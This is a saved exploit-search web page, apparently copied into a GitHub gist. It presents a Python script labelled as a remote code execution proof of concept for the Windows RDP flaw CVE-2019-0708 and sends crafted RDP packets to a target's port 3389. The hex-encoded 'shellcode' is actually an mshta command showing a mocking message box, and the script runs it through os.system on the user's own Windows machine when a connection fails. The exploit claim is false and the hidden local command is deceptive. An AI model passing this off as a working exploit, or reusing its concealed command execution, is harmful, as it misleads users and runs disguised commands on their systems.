Created
May 29, 2019 20:14
-
-
Save PrivyDG/26b90d56235ed0cefaab986fc4b4bd0d to your computer and use it in GitHub Desktop.
rdp_exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>💀 Exploit Microsoft Windows 7/2003/2008 RDP - Remote Code Execution CVE-2019-0708</title> <meta name="robots" content="index, follow"> <meta name="msapplication-TileColor" content="#ffffff"> <meta name="msapplication-TileImage" content="/static/ms-icon-144x144.png"> <meta name="theme-color" content="#ffffff"> <meta property="og:title" content="💀 Exploit Microsoft Windows 7/2003/2008 RDP - Remote Code Execution CVE-2019-0708"> <meta property="og:description" content="Sploitus | Exploit & Hacktool Search Engine"> <meta property="og:image" content="https://sploitus.com/images/logo.png"> <meta property="og:url" content="https://sploitus.com/exploit?id=EDB-ID:46904"> <meta name="twitter:site" content="@Sploitus_com"> <link rel="stylesheet" href="/static/app.css"> <link rel="apple-touch-icon" sizes="57x57" href="/static/apple-icon-57x57.png"> <link rel="apple-touch-icon" sizes="60x60" href="/static/apple-icon-60x60.png"> <link rel="apple-touch-icon" sizes="72x72" href="/static/apple-icon-72x72.png"> <link rel="apple-touch-icon" sizes="76x76" href="/static/apple-icon-76x76.png"> <link rel="apple-touch-icon" sizes="114x114" href="/static/apple-icon-114x114.png"> <link rel="apple-touch-icon" sizes="120x120" href="/static/apple-icon-120x120.png"> <link rel="apple-touch-icon" sizes="144x144" href="/static/apple-icon-144x144.png"> <link rel="apple-touch-icon" sizes="152x152" href="/static/apple-icon-152x152.png"> <link rel="apple-touch-icon" sizes="180x180" href="/static/apple-icon-180x180.png"> <link rel="icon" type="image/png" sizes="192x192" href="/static/android-icon-192x192.png"> <link rel="icon" type="image/png" sizes="32x32" href="/static/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="96x96" href="/static/favicon-96x96.png"> <link rel="icon" type="image/png" sizes="16x16" href="/static/favicon-16x16.png"> <link rel="manifest" href="/static/manifest.json"><script type="application/ld+json">{"@context": "http://schema.org/", "@type": "Product", "name": "Microsoft Windows 7/2003/2008 RDP - Remote Code Execution CVE-2019-0708", "aggregateRating":{"@type": "AggregateRating", "ratingValue" : "5", "ratingCount": "5", "reviewCount": "419"}}</script><script async src="https://www.googletagmanager.com/gtag/js?id=UA-125861816-1"></script><script>window.dataLayer=window.dataLayer || []; function gtag(){dataLayer.push(arguments);}gtag('js', new Date()); gtag('config', 'UA-125861816-1');</script></head><body> <header class="navbar header"> <section class="navbar-center"></section> <section class="navbar-center"> <a class="logo" href="/"> <div class="avatar avatar-xl"> </div><h5 class="page-title">SPLOITUS</h5> </a> </section> <section class="navbar-center"></section> </header> <div class="wrap"> <div class="col-xs-12 col-8"> <div class="centered column соl-8 col-mx-auto col-ml-auto col-mr-auto" id="search-results"> <div class="accordion"> <label class="tile tile-centered"> <div class="tile-icon badgehigh" data-badge="10.0"> <div class="avatar logo logo_exploitdb"></div></div><div class="tile-content"> <h4>Microsoft Windows 7/2003/2008 RDP - Remote Code Execution</h4> <div class="tile-subtitle text-gray">2019-05-22</div></div></label> </div><div class="col-12 centered"> <div class="btn-group btn-group-block"> <button class="btn" id="copy-edb-id46904" data-clipboard-target="#code-edb-id46904">Copy</button> <button class="btn" data-id="edb-id46904" data-action="download">Download</button> <button class="btn" data-id="edb-id46904" data-action="origin">Source</button> <a class="btn" data-id="edb-id46904" data-action="share" href="#share-url">Share</a> </div><pre class="centered code" data-lang="PYTHON"><code id="code-edb-id46904" class="code-block">#RDP Blue POC by k8gege | |
| #Local: Win7 (python) | |
| #Target: Win2003 & Win2008 (open 3389) | |
| import socket | |
| import sys | |
| import os | |
| import platform | |
| buf="" | |
| buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19 | |
| buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224 | |
| buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470 | |
| buf+="\x02\xf0\x80" # ITU-T Rec X.224 | |
| buf+="\x7f\x65\x82\x01\x94\x04" #SERVICE T.125 | |
| buf+="\x01\x01\x04\x01\x01\x01\x01\xff" | |
| buf+="\x30\x19\x02\x04\x00\x00\x00\x00" | |
| buf+="\x02\x04\x00\x00\x00\x02\x02\x04" | |
| buf+="\x00\x00\x00\x00\x02\x04\x00\x00"#COMMUNICATION | |
| buf+="\x00\x01\x02\x04\x00\x00\x00\x00" | |
| buf+="\x02\x04\x00\x00\x00\x01\x02\x02" | |
| buf+="\xff\xff\x02\x04\x00\x00\x00\x02" | |
| buf+="\x30\x19\x02\x04\x00\x00\x00\x01"# TPKT, Version 5, Lenght 12 | |
| buf+="\x02\x04\x00\x00\x00\x01\x02\x04" | |
| buf+="\x00\x00\x00\x01\x02\x04\x00\x00" | |
| buf+="\x00\x01\x02\x04\x00\x00\x00\x00" | |
| buf+="\x02\x04\x00\x00\x00\x01\x02\x02" | |
| buf+="\x04\x20\x02\x04\x00\x00\x00\x02"#MULTIPOINT | |
| buf+="\x30\x1c\x02\x02\xff\xff\x02\x02" | |
| buf+="\xfc\x17\x02\x02\xff\xff\x02\x04" | |
| buf+="\x00\x00\x00\x01\x02\x04\x00\x00" | |
| buf+="\x00\x00\x02\x04\x00\x00\x00\x01" | |
| buf+="\x02\x02\xff\xff\x02\x04\x00\x00" | |
| buf+="\x00\x02\x04\x82\x01\x33\x00\x05" | |
| buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"#message | |
| buf+="\x08\x00\x10\x00\x01\xc0\x00\x44" | |
| buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8" | |
| buf+="\x00\x04\x00\x08\x00\x80\x02\xe0" | |
| buf+="\x01\x01\xca\x03\xaa\x09\x04\x00" | |
| buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"# TPKT, Version 3, Lenght 12 | |
| buf+="\x00\x53\x00\x54\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x04\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"# TPKT, Version 8, Lenght 12 | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#nop | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224 | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x01\xca\x01\x00\x00\x00\x00" | |
| buf+="\x00\x10\x00\x07\x00\x01\x00\x30" | |
| buf+="\x00\x30\x00\x30\x00\x30\x00\x30" | |
| buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"#ITU-T Rec X.224 | |
| buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" | |
| buf+="\x00\x30\x00\x30\x00\x30\x00\x30" | |
| buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" | |
| buf+="\x00\x30\x00\x30\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224 | |
| buf+="\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c" | |
| buf+="\x00\x0d\x00\x00\x00\x00\x00\x00" | |
| buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00" | |
| buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"#ITU-T Rec X.224 | |
| buf+="\x00\x03\x00\x00\x00\x72\x64\x70" | |
| buf+="\x64\x72\x00\x00\x00\x00\x00\x80" | |
| buf+="\x80\x63\x6c\x69\x70\x72\x64\x72" | |
| buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70" | |
| buf+="\x73\x6e\x64\x00\x00\x00\x00\x00" | |
| buf+="\xc0" | |
| buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 | |
| buf+="\x02\xf0\x80" # ITU-T Rec X.224 | |
| buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125 | |
| buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8 | |
| buf+="\x02\xf0\x80" # ITU-T Rec X.224 | |
| buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125 | |
| buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 | |
| buf+="\x02\xf0\x80" # ITU-T Rec X.224 | |
| buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125 | |
| buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 | |
| buf+="\x02\xf0\x80" #ITU-T Rec X.224 | |
| buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125 | |
| buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 | |
| buf+="\x02\xf0\x80" #ITU-T Rec X.224 | |
| buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125 | |
| buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 | |
| buf+="\x02\xf0\x80" #ITU-T Rec X.224 | |
| buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125 | |
| buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 | |
| buf+="\x02\xf0\x80" #ITU-T Rec X.224 | |
| buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125 | |
| buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12 | |
| buf+="\x06\xd0\x00\x00\x12\x34\x00" #ITU-T Rec X.224 | |
| buf2="\x23\x79\x6F\x75\x20\x70\x6C\x61\x79\x20" | |
| buf2+="\x62\x61\x73\x6B\x65\x74\x62\x61\x6C\x6C" | |
| buf2+="\x20\x6C\x69\x6B\x65\x20\x63\x61\x69\x78" | |
| buf2+="\x75\x6B\x75\x6E\x23"; | |
| sc="\x6D\x73\x68\x74\x61\x20\x76\x62\x73\x63" #shellcode | |
| sc+="\x72\x69\x70\x74\x3A\x6D\x73\x67\x62\x6F" | |
| sc+="\x78\x28\x22\x79\x6F\x75\x20\x70\x6C\x61" | |
| sc+="\x79\x20\x62\x61\x73\x6B\x65\x74\x62\x61" | |
| sc+="\x6C\x6C\x20\x6C\x69\x6B\x65\x20\x63\x61" | |
| sc+="\x69\x78\x75\x6B\x75\x6E\x21\x22\x2C\x36" | |
| sc+="\x34\x2C\x22\x4B\x38\x67\x65\x67\x65\x3A" | |
| sc+="\x22\x29\x28\x77\x69\x6E\x64\x6F\x77\x2E" | |
| sc+="\x63\x6C\x6F\x73\x65\x29"; | |
| HOST = sys.argv[1] | |
| PORT = 3389 | |
| print "Win2003 & Win2008 RDP POC" | |
| print "Target: "+HOST | |
| recexec=buf | |
| for i in range(8): | |
| try: | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((HOST,PORT)) | |
| print "sending: %d bytes" % len(buf) | |
| s.send(buf) | |
| rec = s.recv(100) | |
| recexec=sc | |
| print "received: %d bytes" % len(rec) | |
| s.close() | |
| print "" | |
| except: | |
| if(platform.system()=="Windows"): | |
| os.system(recexec)</code> </pre> </div></div></div></div><div class="column"> <div class="modal" id="share-url"><a class="modal-overlay" href="#modals" aria-label="Close"></a> <div class="modal-container" role="document"> <div class="modal-header"><a class="btn btn-clear float-right" href="#modals" aria-label="Close"></a> <div class="modal-title h5">Share</div></div><div class="modal-body"> <div class="content"> <div class="input-group" style="text-align: center"> <input class="form-input copylink" type="text"> <button class="btn btn-primary input-group-btn copybutton" data-clipboard-target=".copylink">Copy</button> </div><div class="social"> <a class="resp-sharing-button__link facebook" rel="noopener" target="_blank" aria-label=""> <div class="resp-sharing-button resp-sharing-button--facebook resp-sharing-button--small"> <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M18.77 7.46H14.5v-1.9c0-.9.6-1.1 1-1.1h3V.5h-4.33C10.24.5 9.5 3.44 9.5 5.32v2.15h-3v4h3v12h5v-12h3.85l.42-4z" /></svg> </div></div></a> <a class="resp-sharing-button__link twitter" rel="noopener" target="_blank" aria-label=""> <div class="resp-sharing-button resp-sharing-button--twitter resp-sharing-button--small"> <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M23.44 4.83c-.8.37-1.5.38-2.22.02.93-.56.98-.96 1.32-2.02-.88.52-1.86.9-2.9 1.1-.82-.88-2-1.43-3.3-1.43-2.5 0-4.55 2.04-4.55 4.54 0 .36.03.7.1 1.04-3.77-.2-7.12-2-9.36-4.75-.4.67-.6 1.45-.6 2.3 0 1.56.8 2.95 2 3.77-.74-.03-1.44-.23-2.05-.57v.06c0 2.2 1.56 4.03 3.64 4.44-.67.2-1.37.2-2.06.08.58 1.8 2.26 3.12 4.25 3.16C5.78 18.1 3.37 18.74 1 18.46c2 1.3 4.4 2.04 6.97 2.04 8.35 0 12.92-6.92 12.92-12.93 0-.2 0-.4-.02-.6.9-.63 1.96-1.22 2.56-2.14z" /></svg> </div></div></a> <a class="resp-sharing-button__link googleplus" rel="noopener" target="_blank" aria-label=""> <div class="resp-sharing-button resp-sharing-button--google resp-sharing-button--small"> <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M11.37 12.93c-.73-.52-1.4-1.27-1.4-1.5 0-.43.03-.63.98-1.37 1.23-.97 1.9-2.23 1.9-3.57 0-1.22-.36-2.3-1-3.05h.5c.1 0 .2-.04.28-.1l1.36-.98c.16-.12.23-.34.17-.54-.07-.2-.25-.33-.46-.33H7.6c-.66 0-1.34.12-2 .35-2.23.76-3.78 2.66-3.78 4.6 0 2.76 2.13 4.85 5 4.9-.07.23-.1.45-.1.66 0 .43.1.83.33 1.22h-.08c-2.72 0-5.17 1.34-6.1 3.32-.25.52-.37 1.04-.37 1.56 0 .5.13.98.38 1.44.6 1.04 1.84 1.86 3.55 2.28.87.23 1.82.34 2.8.34.88 0 1.7-.1 2.5-.34 2.4-.7 3.97-2.48 3.97-4.54 0-1.97-.63-3.15-2.33-4.35zm-7.7 4.5c0-1.42 1.8-2.68 3.9-2.68h.05c.45 0 .9.07 1.3.2l.42.28c.96.66 1.6 1.1 1.77 1.8.05.16.07.33.07.5 0 1.8-1.33 2.7-3.96 2.7-1.98 0-3.54-1.23-3.54-2.8zM5.54 3.9c.33-.38.75-.58 1.23-.58h.05c1.35.05 2.64 1.55 2.88 3.35.14 1.02-.08 1.97-.6 2.55-.32.37-.74.56-1.23.56h-.03c-1.32-.04-2.63-1.6-2.87-3.4-.13-1 .08-1.92.58-2.5zM23.5 9.5h-3v-3h-2v3h-3v2h3v3h2v-3h3" /></svg> </div></div></a> <a class="resp-sharing-button__link linkedin" rel="noopener" target="_blank" aria-label=""> <div class="resp-sharing-button resp-sharing-button--linkedin resp-sharing-button--small"> <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M6.5 21.5h-5v-13h5v13zM4 6.5C2.5 6.5 1.5 5.3 1.5 4s1-2.4 2.5-2.4c1.6 0 2.5 1 2.6 2.5 0 1.4-1 2.5-2.6 2.5zm11.5 6c-1 0-2 1-2 2v7h-5v-13h5V10s1.6-1.5 4-1.5c3 0 5 2.2 5 6.3v6.7h-5v-7c0-1-1-2-2-2z" /></svg> </div></div></a> <a class="resp-sharing-button__link reddit" rel="noopener" target="_blank" aria-label=""> <div class="resp-sharing-button resp-sharing-button--reddit resp-sharing-button--small"> <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M24 11.5c0-1.65-1.35-3-3-3-.96 0-1.86.48-2.42 1.24-1.64-1-3.75-1.64-6.07-1.72.08-1.1.4-3.05 1.52-3.7.72-.4 1.73-.24 3 .5C17.2 6.3 18.46 7.5 20 7.5c1.65 0 3-1.35 3-3s-1.35-3-3-3c-1.38 0-2.54.94-2.88 2.22-1.43-.72-2.64-.8-3.6-.25-1.64.94-1.95 3.47-2 4.55-2.33.08-4.45.7-6.1 1.72C4.86 8.98 3.96 8.5 3 8.5c-1.65 0-3 1.35-3 3 0 1.32.84 2.44 2.05 2.84-.03.22-.05.44-.05.66 0 3.86 4.5 7 10 7s10-3.14 10-7c0-.22-.02-.44-.05-.66 1.2-.4 2.05-1.54 2.05-2.84zM2.3 13.37C1.5 13.07 1 12.35 1 11.5c0-1.1.9-2 2-2 .64 0 1.22.32 1.6.82-1.1.85-1.92 1.9-2.3 3.05zm3.7.13c0-1.1.9-2 2-2s2 .9 2 2-.9 2-2 2-2-.9-2-2zm9.8 4.8c-1.08.63-2.42.96-3.8.96-1.4 0-2.74-.34-3.8-.95-.24-.13-.32-.44-.2-.68.15-.24.46-.32.7-.18 1.83 1.06 4.76 1.06 6.6 0 .23-.13.53-.05.67.2.14.23.06.54-.18.67zm.2-2.8c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zm5.7-2.13c-.38-1.16-1.2-2.2-2.3-3.05.38-.5.97-.82 1.6-.82 1.1 0 2 .9 2 2 0 .84-.53 1.57-1.3 1.87z" /></svg> </div></div></a> <a class="resp-sharing-button__link ycombinator" rel="noopener" target="_blank" aria-label=""> <div class="resp-sharing-button resp-sharing-button--hackernews resp-sharing-button--small"> <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 140 140"> <path fill-rule="evenodd" d="M60.94 82.314L17 0h20.08l25.85 52.093c.397.927.86 1.888 1.39 2.883.53.994.995 2.02 1.393 3.08.265.4.463.764.596 1.095.13.334.262.63.395.898.662 1.325 1.26 2.618 1.79 3.877.53 1.26.993 2.42 1.39 3.48 1.06-2.254 2.22-4.673 3.48-7.258 1.26-2.585 2.552-5.27 3.877-8.052L103.49 0h18.69L77.84 83.308v53.087h-16.9v-54.08z"></path> </svg> </div></div></a> <a class="resp-sharing-button__link vk" rel="noopener" target="_blank" aria-label=""> <div class="resp-sharing-button resp-sharing-button--vk resp-sharing-button--small"> <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M21.547 7h-3.29a.743.743 0 0 0-.655.392s-1.312 2.416-1.734 3.23C14.734 12.813 14 12.126 14 11.11V7.603A1.104 1.104 0 0 0 12.896 6.5h-2.474a1.982 1.982 0 0 0-1.75.813s1.255-.204 1.255 1.49c0 .42.022 1.626.04 2.64a.73.73 0 0 1-1.272.503 21.54 21.54 0 0 1-2.498-4.543.693.693 0 0 0-.63-.403h-2.99a.508.508 0 0 0-.48.685C3.005 10.175 6.918 18 11.38 18h1.878a.742.742 0 0 0 .742-.742v-1.135a.73.73 0 0 1 1.23-.53l2.247 2.112a1.09 1.09 0 0 0 .746.295h2.953c1.424 0 1.424-.988.647-1.753-.546-.538-2.518-2.617-2.518-2.617a1.02 1.02 0 0 1-.078-1.323c.637-.84 1.68-2.212 2.122-2.8.603-.804 1.697-2.507.197-2.507z" /></svg> </div></div></a> <a class="resp-sharing-button__link telegram" rel="noopener" target="_blank" aria-label=""> <div class="resp-sharing-button resp-sharing-button--telegram resp-sharing-button--small"> <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M.707 8.475C.275 8.64 0 9.508 0 9.508s.284.867.718 1.03l5.09 1.897 1.986 6.38a1.102 1.102 0 0 0 1.75.527l2.96-2.41a.405.405 0 0 1 .494-.013l5.34 3.87a1.1 1.1 0 0 0 1.046.135 1.1 1.1 0 0 0 .682-.803l3.91-18.795A1.102 1.102 0 0 0 22.5.075L.706 8.475z" /></svg> </div></div></a> </div></div></div></div></div></div><script src="/static/app.js"> </script> <script type="text/javascript">var exploits=[{"source": "#RDP Blue POC by k8gege\r\n#Local: Win7 (python)\r\n#Target: Win2003 & Win2008 (open 3389)\r\n\r\nimport socket\r\nimport sys\r\nimport os\r\nimport platform\r\n\r\nbuf=\"\"\r\nbuf+=\"\\x03\\x00\\x00\\x13\" # TPKT, Version 3, lenght 19\r\nbuf+=\"\\x0e\\xe0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x00\\x00\\x00\\x00\" # ITU-T Rec X.224\r\nbuf+=\"\\x03\\x00\\x01\\xd6\" # TPKT, Version 3, lenght 470\r\nbuf+=\"\\x02\\xf0\\x80\" # ITU-T Rec X.224\r\nbuf+=\"\\x7f\\x65\\x82\\x01\\x94\\x04\" #SERVICE T.125\r\n\r\nbuf+=\"\\x01\\x01\\x04\\x01\\x01\\x01\\x01\\xff\" \r\nbuf+=\"\\x30\\x19\\x02\\x04\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x02\\x04\\x00\\x00\\x00\\x02\\x02\\x04\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x02\\x04\\x00\\x00\"#COMMUNICATION\r\nbuf+=\"\\x00\\x01\\x02\\x04\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x02\\x04\\x00\\x00\\x00\\x01\\x02\\x02\"\r\nbuf+=\"\\xff\\xff\\x02\\x04\\x00\\x00\\x00\\x02\"\r\nbuf+=\"\\x30\\x19\\x02\\x04\\x00\\x00\\x00\\x01\"# TPKT, Version 5, Lenght 12\r\nbuf+=\"\\x02\\x04\\x00\\x00\\x00\\x01\\x02\\x04\"\r\nbuf+=\"\\x00\\x00\\x00\\x01\\x02\\x04\\x00\\x00\"\r\nbuf+=\"\\x00\\x01\\x02\\x04\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x02\\x04\\x00\\x00\\x00\\x01\\x02\\x02\"\r\nbuf+=\"\\x04\\x20\\x02\\x04\\x00\\x00\\x00\\x02\"#MULTIPOINT\r\nbuf+=\"\\x30\\x1c\\x02\\x02\\xff\\xff\\x02\\x02\"\r\nbuf+=\"\\xfc\\x17\\x02\\x02\\xff\\xff\\x02\\x04\"\r\nbuf+=\"\\x00\\x00\\x00\\x01\\x02\\x04\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x02\\x04\\x00\\x00\\x00\\x01\"\r\nbuf+=\"\\x02\\x02\\xff\\xff\\x02\\x04\\x00\\x00\"\r\nbuf+=\"\\x00\\x02\\x04\\x82\\x01\\x33\\x00\\x05\"\r\nbuf+=\"\\x00\\x14\\x7c\\x00\\x01\\x81\\x2a\\x00\"#message\r\nbuf+=\"\\x08\\x00\\x10\\x00\\x01\\xc0\\x00\\x44\"\r\nbuf+=\"\\x75\\x63\\x61\\x81\\x1c\\x01\\xc0\\xd8\"\r\nbuf+=\"\\x00\\x04\\x00\\x08\\x00\\x80\\x02\\xe0\"\r\nbuf+=\"\\x01\\x01\\xca\\x03\\xaa\\x09\\x04\\x00\"\r\nbuf+=\"\\x00\\xce\\x0e\\x00\\x00\\x48\\x00\\x4f\"# TPKT, Version 3, Lenght 12\r\nbuf+=\"\\x00\\x53\\x00\\x54\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\"# TPKT, Version 8, Lenght 12\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"#nop\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"#ITU-T Rec X.224\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x01\\xca\\x01\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x10\\x00\\x07\\x00\\x01\\x00\\x30\"\r\nbuf+=\"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x30\"\r\nbuf+=\"\\x00\\x2d\\x00\\x30\\x00\\x30\\x00\\x30\"#ITU-T Rec X.224\r\nbuf+=\"\\x00\\x2d\\x00\\x30\\x00\\x30\\x00\\x30\"\r\nbuf+=\"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x30\"\r\nbuf+=\"\\x00\\x2d\\x00\\x30\\x00\\x30\\x00\\x30\"\r\nbuf+=\"\\x00\\x30\\x00\\x30\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"#ITU-T Rec X.224\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x04\\xc0\\x0c\"\r\nbuf+=\"\\x00\\x0d\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\x00\\x02\\xc0\\x0c\\x00\\x1b\\x00\\x00\"\r\nbuf+=\"\\x00\\x00\\x00\\x00\\x00\\x03\\xc0\\x2c\"#ITU-T Rec X.224\r\nbuf+=\"\\x00\\x03\\x00\\x00\\x00\\x72\\x64\\x70\"\r\nbuf+=\"\\x64\\x72\\x00\\x00\\x00\\x00\\x00\\x80\"\r\nbuf+=\"\\x80\\x63\\x6c\\x69\\x70\\x72\\x64\\x72\"\r\nbuf+=\"\\x00\\x00\\x00\\xa0\\xc0\\x72\\x64\\x70\"\r\nbuf+=\"\\x73\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\"\r\nbuf+=\"\\xc0\"\r\n\r\nbuf+=\"\\x03\\x00\\x00\\x0c\" # TPKT, Version 3, Lenght 12\r\nbuf+=\"\\x02\\xf0\\x80\" # ITU-T Rec X.224\r\nbuf+=\"\\x04\\x01\\x00\\x01\\x00\" # MULTIPOINT-COMMUNICATION-SERVICE T.125\r\nbuf+=\"\\x03\\x00\\x00\\x08\" #TPKT, Version 3, Length 8\r\nbuf+=\"\\x02\\xf0\\x80\" # ITU-T Rec X.224\r\nbuf+=\"\\x28\" # MULTIPOINT-COMM-SERVICE T.125\r\nbuf+=\"\\x03\\x00\\x00\\x0c\" # TPKT, Version 3, Lenght 12\r\nbuf+=\"\\x02\\xf0\\x80\" # ITU-T Rec X.224\r\nbuf+=\"\\x38\\x00\\x06\\x03\\xef\" # MULTIPOINT-COMM-SERVICE T.125\r\nbuf+=\"\\x03\\x00\\x00\\x0c\" # TPKT, Version 3, Lenght 12\r\nbuf+=\"\\x02\\xf0\\x80\" #ITU-T Rec X.224\r\nbuf+=\"\\x38\\x00\\x06\\x03\\xeb\" # MULTIPOINT-COMM-SERVICE T.125\r\nbuf+=\"\\x03\\x00\\x00\\x0c\" # TPKT, Version 3, Lenght 12\r\nbuf+=\"\\x02\\xf0\\x80\" #ITU-T Rec X.224\r\nbuf+=\"\\x38\\x00\\x06\\x03\\xec\"# MULTIPOINT-COMM-SERVICE T.125\r\nbuf+=\"\\x03\\x00\\x00\\x0c\" # TPKT, Version 3, Lenght 12\r\nbuf+=\"\\x02\\xf0\\x80\" #ITU-T Rec X.224\r\nbuf+=\"\\x38\\x00\\x06\\x03\\xed\"# MULTIPOINT-COMM-SERVICE T.125\r\nbuf+=\"\\x03\\x00\\x00\\x0c\" # TPKT, Version 3, Lenght 12\r\nbuf+=\"\\x02\\xf0\\x80\" #ITU-T Rec X.224\r\nbuf+=\"\\x38\\x00\\x06\\x03\\xee\"# MULTIPOINT-COMM-SERVICE T.125\r\nbuf+=\"\\x03\\x00\\x00\\x0b\" # TPKT, Version 3, Lenght 12\r\nbuf+=\"\\x06\\xd0\\x00\\x00\\x12\\x34\\x00\" #ITU-T Rec X.224\r\nbuf2=\"\\x23\\x79\\x6F\\x75\\x20\\x70\\x6C\\x61\\x79\\x20\"\r\nbuf2+=\"\\x62\\x61\\x73\\x6B\\x65\\x74\\x62\\x61\\x6C\\x6C\"\r\nbuf2+=\"\\x20\\x6C\\x69\\x6B\\x65\\x20\\x63\\x61\\x69\\x78\"\r\nbuf2+=\"\\x75\\x6B\\x75\\x6E\\x23\";\r\nsc=\"\\x6D\\x73\\x68\\x74\\x61\\x20\\x76\\x62\\x73\\x63\" 